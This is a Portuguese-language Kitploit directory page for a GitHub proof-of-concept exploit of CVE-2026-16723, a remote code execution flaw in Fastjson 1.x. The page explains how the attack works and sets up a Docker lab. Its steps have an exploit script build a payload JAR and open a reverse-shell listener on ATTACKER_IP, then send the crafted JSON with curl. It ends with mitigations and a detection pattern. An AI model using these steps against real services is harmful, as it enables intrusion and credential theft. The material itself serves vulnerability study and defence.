Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-16723 — Proof-of-concept de exploit para CVE-2026-16723, uma falha de execução remota de código no Fastjson 1.x @JSONType, com um construtor de JAR de payload e um listener de reverse shell. | Kitploit
Ferramentas/GitHubGitHub/yym8538/cve-2026-16723
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubyym8538/cve-2026-16723

CVE-2026-16723

Proof-of-concept de exploit para CVE-2026-16723, uma falha de execução remota de código no Fastjson 1.x @JSONType, com um construtor de JAR de payload e um listener de reverse shell.

Ver Repositório
1há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


Visão Geral

CVE-2026-16723 é uma vulnerabilidade de Execução Remota de Código (RCE) no Fastjson 1.x (1.2.68 – 1.2.83). Quando o Fastjson analisa um JSON controlado pelo atacante, um valor @type criado especificamente é transformado em uma consulta de recurso de classe dentro de checkAutoType. Em um fat-JAR executável do Spring Boot, o class loader resolve esse nome como uma URL jar:http:// e busca um JAR remoto (SSRF), depois carrega uma classe que carrega a anotação @JSONType, mesmo com o AutoType desabilitado. Como um JDK / Tomcat moderno rejeita o nome binário jar:http://, a variante confiável insere o JAR no cache da JVM e o relê através de jar:file:/proc/self/fd/N, de modo que a classe é definida e seu inicializador estático é executado, permitindo a execução de código. O AutoType permanece desabilitado e nenhum gadget do classpath é necessário.


Versões Afetadas

CategoriaVersão
VulnerávelFastjson 1.2.68 ≤ versão ≤ 1.2.83
CorrigidaMigrar para Fastjson 2.x (não há versão 1.x corrigida)

Impacto

  • Execução Remota de Código com a conta de serviço
  • Divulgação de segredos / credenciais do host e do ambiente
  • Comprometimento total da aplicação afetada

Ambiente

O alvo do laboratório é uma loja pública (Northwind Store) cuja API de busca vincula o corpo da requisição com o Fastjson. Tudo está na configuração padrão do Fastjson: SafeMode desligado, AutoType desligado, empacotado como um fat-JAR do Spring Boot.

docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
Pré-condiçãoEstado neste laboratório
Fastjson 1.2.68 – 1.2.831.2.83
Fat-JAR executável do Spring Bootsim
Caminho de análise de JSON não autenticadoPOST /api/products/search
SafeMode / AutoTypepadrão (ambos desligados)

PoC

O atacante e o alvo executam na mesma rede bridge do Docker, então o alvo alcança o atacante como uma conexão de saída (nenhuma porta extra é publicada).

Passo 1. Confirme que o alvo está ativo

curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

Passo 2. Execute o exploit na máquina do atacante

exploit.py constrói o JAR do payload, o serve, inicia um listener e imprime o corpo da requisição. Apenas o endereço de callback é necessário.

python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

Passo 3. Entregue o payload

Cole o corpo impresso no endpoint de busca (Burp Repeater ou curl) e envie-o. A requisição de busca é uma funcionalidade normal; apenas seu corpo JSON é criado especificamente.

curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

Passo 4. Confirme o resultado

O código é executado com a conta de serviço. Recupere a flag através do shell obtido:

whoami

Mitigação

  • Migre para o Fastjson 2.x
  • Ou execute com.alibaba:fastjson:1.2.83_noneautotype
  • Ou inicie a JVM com -Dfastjson.parser.safeMode=true
  • Detecção: valores @type em JSON contendo padrões jar:http ou jar:file / /proc/self/fd

Análise

  • KR:
  • EN:
Baixar ferramenta